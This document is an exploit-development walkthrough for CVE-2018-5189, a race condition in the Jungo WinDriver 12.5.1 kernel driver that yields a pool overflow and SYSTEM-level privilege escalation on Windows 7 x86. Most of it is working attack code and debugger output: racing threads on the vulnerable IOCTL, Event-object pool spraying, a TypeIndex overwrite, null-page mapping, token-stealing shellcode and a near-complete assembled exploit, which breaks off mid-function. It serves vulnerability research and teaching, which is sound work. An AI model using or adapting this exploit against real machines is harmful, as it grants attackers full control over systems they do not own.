Lucene search

K
seebugRootSSV:97083
HistoryJan 16, 2018 - 12:00 a.m.

CODE EXECUTION (CVE-2018-5189) WALKTHROUGH ON JUNGO WINDRIVER 12.5.1

2018-01-1600:00:00
Root
www.seebug.org
55

EPSS

0.001

Percentile

35.4%

INTRODUCTION

Windows kernel exploitation can be a daunting area to get into. There are tons of helpful tutorials out there and originally this post was going to add to that list. This is the story of how I found CVE-2018-5189 and a complete walkthrough of the exploit development cycle.

The idea was to find a 3rd party driver someone had already found a vulnerability for and work through developing an exploit. What ended up actually happening was discovering a previously undisclosed vulnerability in the “patched” version of that driver. This post will cover how we went from Windows kernel exploitation virgins to our first privilege escalation exploit, leveraging a race condition/double fetch to trigger a pool overflow. We won’t go into every aspect of the exploit as some topics have been done to death (such as trivial pool spraying), in these cases, we’ll link what we found to be useful references.

The product in question is Jungo’s Windriver version 12.5.1 [1]. This target was chosen after spotting a vulnerability disclosed in the previous version from Steven Seeley [2], and the plan was to step through the exploit he’d written and learn from it. After running through that exploit, we then downloaded the patched version and started to see if we could find anything new.

The setup used was a Windows 7 x86 VM with kernel debugging enabled.

STATIC ANALYSIS

When looking for vulnerabilities in device drivers, the first place we would generally look is the IOCTL handler as this is where we can trace user input. As we can see here, it’s a bit of a monster:

One of the areas which captured our attention was the following group of IOCTL’s, which all call the same function:

Reversing sub_4199D8 gives the following insight.

The first basic block takes our user buffer and uses a value at offset 0x34 as the argument to another function:

Sub_4082D4 takes the value it’s passed and does some manipulation of that value before passing it off to ExAllocatePoolWithTag.

The astute reader may notice that there’s an integer overflow in this function. We tried finding some way of exploiting it but in the end, settled with exploiting the next issue.

A little later back in sub_4199D8 the following copying loop occurs:

The logic here is quite simple (and slightly flawed). Starting at user_buff+0x38 and pool_buff+0x3C, it continually copies 10 bytes at a time. Notice however that the loop guard compares the counter (eax) with the user-defined size (ebx+0x34). This is a classic race condition, albeit slightly tricky since it occurs over and over.

PATH TO EXPLOITATION

So we have a race condition that should allow us to overflow a pool buffer that has a size that we roughly control. This is generally a pretty good situation to be in. To exploit this issue we need to take the following steps:

  • Understand how we can trigger the vulnerability with threads.
  • Understand how we can manipulate pool pages to control the overflow.
  • Understand how this manipulation can lead to code execution.
  • Finally, find some way of checking our exploit has worked so that we can break out of the race.

This is usually a good way to approach exploit development, start with a list of problems and find solutions for each in turn. To start with, we should look at developing a proof of concept that causes a crash, allowing us to debug the kernel.

Consider the following situation, we have 2 threads running on separate cores, both of which share access to the same user buffer that will be supplied to the driver. The first thread will continually make calls to the driver’s IOCTL interface, whilst the second will continually manipulate the size at user_buff+0x34.

The second function is extremely simple:

/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI ioctl_thread(LPVOID user_size)
{
while (TRUE)
{
*(ULONG *)(user_size) ^= 0xff;
}
return 0;
}

All we do here is flip the value from whatever it was when it was passed to the function by xoring it with 0xff.

The next function is also pretty straightforward:

DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
    char out_buff[40];
    DWORD bytes_returned;

    HANDLE hdevice = CreateFile(device,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0
    );

    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't open device\n");
    }

    DeviceIoControl(hdevice,
        0x95382623,
        user_buff,
        0x1000,
        out_buff,
        40,
        &bytes_returned,
        0);

    return 0;
}

We simply open a handle to the device using CreateFile, and then trigger a call to the vulnerable function through DeviceIoControl. Note that the user_buff parameter is shared between both threads.

With both of our functions defined, we now need a way of executing them on separate cores. We put this all together with a few nice functions Windows provides: CreateThread, SetThreadPriority, SetThreadAffinityMask and ResumeThread.

Putting this together we get the following:

int main()
{
    HANDLE h_flip_thread;
    HANDLE h_ioctl_thread;
    DWORD mask = 0;
    char *user_buff;
    
    user_buff = (char *)VirtualAlloc(NULL,
        0x1000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_NOCACHE | PAGE_READWRITE);

    if (user_buff == NULL)
    {
        printf("[x] Couldn't allocate memory for buffer\n");
        return -1;
    }
    memset(user_buff, 0x41, 0x1000);

    *(ULONG *)(user_buff + 0x34) = 0x00000041; //set the size initially to 0x41

    /*
    * create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
    * Set its priority to highest.
    * Set its mask so that it runs on a particular core.
    */
    
    h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
    SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
    SetThreadAffinityMask(h_flip_thread, 0);
    ResumeThread(h_flip_thread);
    printf("[+] Starting race...\n");

    while (TRUE)
    {
        h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
        SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
        SetThreadAffinityMask(h_ioctl_thread, 1);
        
        ResumeThread(h_ioctl_thread);
        
        WaitForSingleObject(h_ioctl_thread, INFINITE);
    }

    return 0;
}

The goal here is to start two concurrent threads such that while one thread is manipulating the user-supplied size, the other is executing the vulnerable IOCTL. The aim is to consistently achieve a state whereby the value at user_buff+0x34 is larger than it originally was when it was used to allocate the pool buffer. At first, I assumed this would be extremely difficult because it is fetched from user space on every iteration, in reality, the above code should cause a bug check (BSOD) after a second or two.

With Windbg attached for kernel debugging [6], we get the following crash:

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 86ff3488, The pool entry we were looking for within the page.
Arg3: 86ff3758, The next pool entry.
Arg4: 085a002c, (reserved)<code>

Let’s look at the pool to see what’s happened, to do this we make use of a Windbg plugin called poolinfo. We can see the following pool information:

0: kd&gt; !poolpage 86ff3488
walking pool page @ 86ff3000
Addr      A/F   BlockSize     PreviousSize  PoolIndex PoolType Tag
-------------------------------------------------------------------
86ff3000: InUse 02E8 (05D)    0000 (000)           00       02 Thr.
86ff32e8: InUse 0040 (008)    02E8 (05D)           00       02 SeTl
86ff3328: Free  0160 (02C)    0040 (008)           00       00 ALP.
*86ff3488: Free  02D0 (05A)    0160 (02C)           00       04 RDW.
86ff3758: Free  0000 (000)    0000 (000)           00       00 ....

Notice how the free block after the drivers buffer has a strange header. Everything has been nulled out, which is not correct even for a free block. Looking at this buffer reveals that our user-controlled data ends just before this pools header:

0: kd&gt; dd 86ff3758-8
86ff3750  41414141 00004141 00000000 00000000 -- pool header
86ff3760  00000000 00000000 00000000 00000000
86ff3770  00000000 00000000 00000000 00000000
86ff3780  00000000 00000000 00000000 00000000
86ff3790  00000000 00000000 00000000 00000000
86ff37a0  00000000 00000000 00000000 00000000
86ff37b0  00000000 00000000 00000000 00000000
86ff37c0  00000000 00000000 00000000 00000000

It took a bit of time to figure this out, but essentially what is happening here is that the race condition loop is exiting due to the constant flipping. For example, we overflow by 4 bytes, but then on the next check, the value has been flipped back to the original size, breaking us out of the loop prematurely. This isn’t particularly bad, it just means it’s harder to demonstrate a proof of concept, to get around this issue, we just have to make sure that at whatever stage the loop exits, valid data is being written to the next pool buffer (i.e a correct pool header).

For now, we sort of have a working proof of concept, we know we can overflow the pool header of the next object, and so we need some way of controlling that object. The topic of pool spraying has been covered extensively online, and we won’t go into the nitty-gritty details here – a good reference I used was http://trackwatch.com/windows-kernel-pool-spraying/.

There are however specifics for this exploit that are important. To start with, it’s important to remember that we have control over the size of the allocation (remember that the size we pass becomes (size – 1) * 0xa + 0x48. Now the basic principles of pool spraying follow a pattern of:

  • Repeatedly create some objects a large number of times.
  • Free an exact number of sequential objects in random spots to create holes of specific sizes.
  • Trigger a call to the vulnerable driver where the pool allocation should fill one of the holes we created, meaning we know the object that will be located after it in memory.

After some trial and error, we decided to use the Event object with a typeIndex overwrite. The following function sprays the kernel pool with a large number of Event objects, and then creates holes in random places that are exactly 0x380 bytes large.

void spray_pool(HANDLE handle_arr[])
{
    //create SPRAY_SIZE event objects filling up the pool
    for (int i = 0; i &lt; SPRAY_SIZE; i++)
    {
        handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
    }

       //create holes in the pool of size 0x380
    for (int i = 0; i &lt; SPRAY_SIZE; i+=50)
    {
        for (int j = 0; j &lt; 14 && j + i &lt; SPRAY_SIZE; j++)
        {
            CloseHandle(handle_arr[j + i]);
        }
    }
}

We add a call to this function just before entering the while loop in main, and get another crash, we inspect the pool page that caused the crash and find we have an allocated buffer exactly where we want it:

*** Fatal System Error: 0x00000019
(0x00000020,0x861306C0,0x86130A40,0x08700008)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!RtlpBreakWithStatusInstruction:
82ab5a38 cc int 3
0: kd&gt; !poolpage 0x861306C0
walking pool page @ 86130000
Addr A/F BlockSize PreviousSize PoolIndex PoolType Tag
-------------------------------------------------------------------
86130000: InUse 0040 (008) 0000 (000) 00 02 Eve.
86130040: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130080: InUse 0040 (008) 0040 (008) 00 02 Eve.
861300c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130100: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130140: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130180: InUse 0040 (008) 0040 (008) 00 02 Eve.
861301c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130200: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130240: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130280: InUse 0040 (008) 0040 (008) 00 02 Eve.
861302c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130300: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130340: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130380: InUse 0040 (008) 0040 (008) 00 02 Eve.
861303c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130400: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130440: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130480: InUse 0040 (008) 0040 (008) 00 02 Eve.
861304c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130500: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130540: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130580: InUse 0040 (008) 0040 (008) 00 02 Eve.
861305c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130600: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130640: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130680: InUse 0040 (008) 0040 (008) 00 02 Eve.
*861306c0: Free 0380 (070) 0040 (008) 00 04 RDW. --- here
86130a40: InUse 0040 (008) 0000 (000) 00 02 Eve.
86130a80: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130ac0: InUse 0040 (008) 0040 (008) 00 02 Eve.

This now means that we have full control over the next object that we intend to corrupt. We have now solved our first two problems, with the next being how we manipulate the Event object to cause code execution.

As previously mentioned, we are using the typeIndex overwrite method, there are other ways to exploit this issue with Tarjei Mandt’s paper providing an extremely good reference for all of them [3]. If we look at the structure of an Event object we gain a bit of insight as to where to go:

kd&gt;; dt nt!_POOL_HEADER  8514fac0
+0x000 PreviousSize     : 0y010001100 (0x8c)
+0x000 PoolIndex        : 0y0000000 (0)
+0x002 BlockSize        : 0y000001000 (0x8)
+0x002 PoolType         : 0y0000010 (0x2)
+0x000 Ulong1           : 0x408008c  --- here
+0x004 PoolTag          : 0xee657645  -- here 
+0x004 AllocatorBackTraceIndex : 0x7645 
+0x006 PoolTagHash : 0xee65 

kd&gt;; dt nt!_OBJECT_HEADER_QUOTA_INFO 8545f8c0+8 ;+8 to skip past pool header
+0x000 PagedPoolCharge  : 0
+0x004 NonPagedPoolCharge : 0x40
+0x008 SecurityDescriptorCharge : 0
+0x00c SecurityDescriptorQuotaBlock : (null)

kd&gt; dt nt!_OBJECT_HEADER 8545f8c0+8+10 ;skip past pool header and Quota info
+0x000 PointerCount : 0n1
+0x004 HandleCount : 0n1
+0x004 NextToFree : 0x00000001 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : 0xc ''
+0x00d TraceFlags : 0 ''
+0x00e InfoMask : 0x8 ''
+0x00f Flags : 0 ''
+0x010 ObjectCreateInfo : 0x867b3940 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : 0x867b3940 Void
+0x014 SecurityDescriptor : (null)
+0x018 Body : _QUAD
There are a few values here that we need to keep to stop us from blue-screening. We need to fix the previousSize value to 0x380 (the size of the RDW pool buffer), and then keep all of the other values except the TypeIndex. The TypeIndex is an index into an array of pointers that describes the type of the chunk [4]:
<code>1: kd&gt; dd nt!ObTypeIndexTable
82b7dee0  00000000 bad0b0b0 84b43360 84b43298
82b7def0  84b4af78 84b4ad48 84b4ac08 84b4ab40
82b7df00  84b4aa78 84b4a9b0 84b4a8e8 84b4a7e8
82b7df10  84c131d0 84bf7900 84bf7838 84bf7770
82b7df20  84c0f9c8 84c0f900 84c0f838 84c039c8
82b7df30  84c03900 84c03838 84bef9c8 84bef900
82b7df40  84bef838 84bcb5e0 84bcb518 84bcb450
82b7df50  84bc3c90 84bc34f0 84bc3428 84c0df78

If we overwrite the TypeIndex to 0 then the object will attempt to look for the corresponding OBJECT_TYPE information in the null page.

0: kd&gt; dt nt!_OBJECT_TYPE 86eb7000 .
+0x000 TypeList         :  [ 0x80000 - 0xee657645 ]
+0x000 Flink            : 0x00080000 _LIST_ENTRY
+0x004 Blink            : 0xee657645 _LIST_ENTRY
+0x008 Name             :  "瀈蛫倈蔔???"
+0x000 Length           : 0x8008
+0x002 MaximumLength    : 0x86ea
+0x004 ReadVirtual: 82b70938 not properly sign extended
Buffer           : 0x82b70938  "瀈蛫倈蔔???"
+0x010 DefaultObject    :
+0x014 Index            : 0 ''
+0x018 TotalNumberOfObjects : 0
+0x01c TotalNumberOfHandles : 0
+0x020 HighWaterNumberOfObjects : 0
+0x024 HighWaterNumberOfHandles : 0x80001
+0x028 TypeInfo         :
&lt;…Snip…&gt;
+0x00c GenericMapping   : _GENERIC_MAPPING
+0x01c ValidAccessMask  : 0xee657645
+0x020 RetainAccess     : 0
+0x024 PoolType         : 0x40 (No matching name)
+0x028 DefaultPagedPoolCharge : 0
+0x02c DefaultNonPagedPoolCharge : 0
+0x030 DumpProcedure    : 0x00000001        void  +1
+0x034 OpenProcedure    : 0x00000001        long  +1
+0x038 CloseProcedure   : (null)
+0x03c DeleteProcedure  : 0x0008000c        void  +8000c
+0x040 ParseProcedure   : 0x86dd0d80        long  +ffffffff86dd0d80
+0x044 SecurityProcedure : (null)
+0x048 QueryNameProcedure : 0x00040001        long  +40001
+0x04c OkayToCloseProcedure : (null)
&lt;…Snip…&gt;

Remember we are using Windows 7 here, so we can map a null page a create our own OkayToClose procedure. The first thing we need to do is change our user space buffer so it contains the correct values:

//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag

//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex &lt;--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged

To control this overflow we also need to figure out what to flip the size value from and to. We have a buffer that is 0x378 bytes (0x380 with the 8 byte pool header), and we only want to overflow the next event object. This gives us a requirement of a 0x40 byte overflow, 0x378+0x40 = 0x3b8, and remember the manipulation when the pool is allocated, (0x3b8 – 0x48) / 0x0a = 0x58. Finally, to flip the value between 0x52 and 0x58 we xor the value with 10.

We then need to free the corrupted object, we can do this by simply closing all of the open handles. And we get the following bug check:

Access violation - code c0000005 (!!! second chance !!!)
nt!MmInitializeProcessAddressSpace+0xc6:
82c5e520 837b7400        cmp     dword ptr [ebx+74h],0
0: kd&gt; r
eax=c6239b40 ebx=00000000 ecx=00000000 edx=872aab58 esi=872aab58 edi=84c3c498
eip=82c5e520 esp=be363ba0 ebp=be363bdc iopl=0         nv up ei ng nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282
nt!MmInitializeProcessAddressSpace+0xc6:
82c5e520 837b7400        cmp     dword ptr [ebx+74h],0 ds:0023:00000074=????????

This looks a bit odd at first glance, ebx is null, and it is looking at a value at 0x74. If we look at edx, we see it is the Event object directly after the overflown buffer:

872aa7c0: Free  0380 (070)    0040 (008)           00       00 RDW.
*872aab40: InUse 0040 (008)    0380 (070)           00       02 Eve.
872aab80: Free  0040 (008)    0040 (008)           00       04 Eve.

0: kd&gt; dd 872aab40
872aab40 04080070 ee657645 00000000 00000040
872aab50 00000000 00000000 00000001 00000001
872aab60 00000000 00080000 867b3940 00000000
872aab70 00000000 00000000 872aab78 872aab78

Notice that the TypeIndex has been successfully overwritten, which has caused the kernel to look for an okayToCloseProcedure at 0x74. At this point we are very close, the next stage involves mapping a null page and putting a pointer to a function we want to execute (in kernel mode). The following function takes care of this for us:

BOOL map_null_page()
{
    /* Begin NULL page map */
    HMODULE hmodule = LoadLibraryA("ntdll.dll");
    if (hmodule == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't get handle to ntdll.dll\n");
        return FALSE;
    }
    PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
    if (AllocateVirtualMemory == NULL)
    {
        printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
        return FALSE;
    }
    SIZE_T size = 0x1000;
    PVOID address = (PVOID)0x1;
    NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
        &address,
        0,
        &size,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);
    if (allocStatus != 0)
    {
        printf("[x] Error mapping null page\n");
        return FALSE;
    }
    printf("[+] Mapped null page\n");
    return TRUE;
}

We then put 0x41414141 at offset 0x74, which should cause an access violation, giving us a clear indication that we can control eip:

************* Symbol Path validation summary**************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\symbols*http://msdl.microsoft.com/download/symbols
Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

Now we know how to control code execution, we need to find some way of escalating our privileges and returning to userland without crashing. The standard way of doing this is to use a token stealing shellcode to steal a SYSTEM token, an excellent post by Sam Brown covers this topic well [5]. The one thing to note here is that we must take into account how many arguments were pushed onto the stack and account for that when we return.

We can see here that ObpQueryNameString pushes 16 bytes onto the stack before calling our shellcode (ebx+0x74):

nt!ObpQueryNameString+0x433:
82c60555 ff7518          push    dword ptr [ebp+18h]
82c60558 ff7514          push    dword ptr [ebp+14h]
82c6055b ff74241c        push    dword ptr [esp+1Ch]
82c6055f ff7510          push    dword ptr [ebp+10h]
82c60562 ff5374          call    dword ptr [ebx+74h]

For a while, we kept getting blue screens even with a ret 0x10 at the end of the shellcode. The solution was found by declaring the function using __declspec(naked), this simply does not provide the function with a prologue or epilogue (exactly what we need). The (only slightly modified) code is shown here:

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID

/*
* The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.
*/
__declspec(naked) VOID TokenStealingShellcode() {
    __asm {
        ; initialize
        mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
        mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

        mov ecx, eax; Copy current _EPROCESS structure

        mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
        mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

        ; begin system token search loop
        SearchSystemPID :
            mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

        mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
        mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process
        
        End :
            ret 0x10; cleanup for cdecl

    }
}

Setting an int 3 breakpoint at the start of the shellcode is sometimes a nice way to check it’s being hit, with all of this together we end up hitting it:

Break instruction exception - code 80000003 (first chance) 00f61790 cc int 3 0: kd&gt; kb
# ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 b7827b88 82c60565 85407d28 857bef30 0001c34c 0xf61790
01 b7827bdc 82c6043f bdd0fc48 c5fa0698 85407d28 nt!ObpQueryNameString+0x443
&lt;…Snip…

0x00f61790 is the address of our token stealing shellcode function, so we have successfully got control of eip.

Now all of this is great if we weren’t stuck in an infinite loop, but we are, and we need some way of figuring out we have escalated our credentials to then break out of the loop and pop a shell. There are a few ways to do this, we could simply set some value in our shellcode and then check it in the while loop. Being relatively new to the Windows API, we decided to look for some way of checking if our current privileges had changed on every iteration of the loop. In the end, we decided to use the GetTokenInformation function. The process is as follows:

  • Get a handle to the current process token using OpenProcessToken.
  • Make a call to GetTokenInformation to get the required size.
  • Allocate memory on the heap for a PTOKEN_PRIVILEGES structure.
  • Make a second call to GetTokenInformation with the required length.
  • Read the value of PTOKEN_PRIVILEGES->PrivilegeCount.

The following code elaborates on this process:

BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
    HANDLE htoken;
    DWORD length;
    PTOKEN_PRIVILEGES current_priv;

    if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
    {
        printf("[x] Couldn't get current token\n");
        return FALSE;
    }

    //get the size required for the current_priv allocation
    GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);

    //allocate memory for the structure
    current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);

    //get the actual token info
    GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
    DWORD new_count = current_priv-&gt;PrivilegeCount;

    HeapFree(GetProcessHeap(), 0, current_priv);
    CloseHandle(htoken);

    *updated_count = new_count; //update the count 
    if (new_count &gt; old_count)
    {
        printf("[+] We now have %d privileges\n");
        return TRUE;
    }
    else
        return FALSE;
}

One call to this function is made at the beginning of main to get our current privilege count, and another is made during the while loop:

check_priv_count(-1, &orig_priv_count);
printf("[+] Original priv count: %d\n", orig_priv_count);
&lt;…Snip…&gt;
if (check_priv_count(orig_priv_count, &orig_priv_count))
{
    printf("[+] Breaking out of loop, popping shell!\n");
    break;
}

With all of this together, we get our lovely SYSTEM shell:

CODE

The code is presented here, there are two things to note. The first is the initial instructions in the shellcode that check whether the function has already been hit, we were getting an unexpected kernel mode trap bug without it. Secondly, on each iteration of the while loop we need to reset the user mode buffer, if we don’t we end up corrupting an Event object with arbitrary data, we couldn’t trace the cause of this, but it was assumed to be down to the buffer being modified by the driver.

// ConsoleApplication1.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include &lt;Windows.h&gt;
#include &lt;winioctl.h&gt;

#define device L"\\\\.\\WINDRVR1251"
#define SPRAY_SIZE 30000

typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PULONG AllocationSize,
    ULONG AllocationType,
    ULONG Protect
    );

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID
/*
* The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.
*/
__declspec(naked) VOID TokenStealingShellcode() {
    __asm {
       hasRun:
             xor eax, eax; Set zero
             cmp byte ptr [eax], 1; If this is 1, we have already run this code
             jz End;
             mov byte ptr [eax], 1; Indicate that this code has been hit already

            ; initialize
            mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
            mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

            mov ecx, eax; Copy current _EPROCESS structure

            mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
            mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

            ; begin system token search loop
            SearchSystemPID :
        mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process

            End :
        ret 0x10; cleanup for cdecl

    }
}

BOOL map_null_page()
{
    /* Begin NULL page map */
    HMODULE hmodule = LoadLibraryA("ntdll.dll");
    if (hmodule == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't get handle to ntdll.dll\n");
        return FALSE;
    }
    PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
    if (AllocateVirtualMemory == NULL)
    {
        printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
        return FALSE;
    }

    SIZE_T size = 0x1000;
    PVOID address = (PVOID)0x1;
    NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
        &address,
        0,
        &size,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);

    if (allocStatus != 0)
    {
        printf("[x] Error mapping null page\n");
        return FALSE;
    }
    
    printf("[+] Mapped null page\n");
    return TRUE;
}

/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI flip_thread(LPVOID user_size)
{
    printf("[+] Flipping thread started\n");
    while (TRUE)
    {
        *(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
    }
    return 0;
}

DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
    char out_buff[40];
    DWORD bytes_returned;
    
    HANDLE hdevice = CreateFile(device,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0
    );

    
    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't open device\n");
    }

    NTSTATUS ret = DeviceIoControl(hdevice,
        0x95382623,
        user_buff,
        0x1000,
        out_buff,
        40,
        &bytes_returned,
        0);
    
    CloseHandle(hdevice);
    return 0;
}

void spray_pool(HANDLE handle_arr[])
{
    //create SPRAY_SIZE event objects filling up the pool
    for (int i = 0; i &lt; SPRAY_SIZE; i++)
    {
        handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
    }

    for (int i = 0; i &lt; SPRAY_SIZE; i+=50)
    {
        for (int j = 0; j &lt; 14 && j + i &lt; SPRAY_SIZE; j++)
        {
            CloseHandle(handle_arr[j + i]);
            handle_arr[j + i] = 0;
        }
    }
}

void free_events(HANDLE handle_arr[])
{
    for (int i = 0; i &lt; SPRAY_SIZE; i++)
    {
        if (handle_arr[i] != 0)
        {
            CloseHandle(handle_arr[i]);
        }
    }
}

BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
    HANDLE htoken;
    DWORD length;
    DWORD temp;
    DWORD new_count;
    PTOKEN_PRIVILEGES current_priv = NULL;

    if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
    {
        printf("[x] Couldn't get current token\n");
        return FALSE;
    }

    //get the size required for the current_priv allocation
    GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);

    //allocate memory for the structure
    current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);

    //get the actual token info
    GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
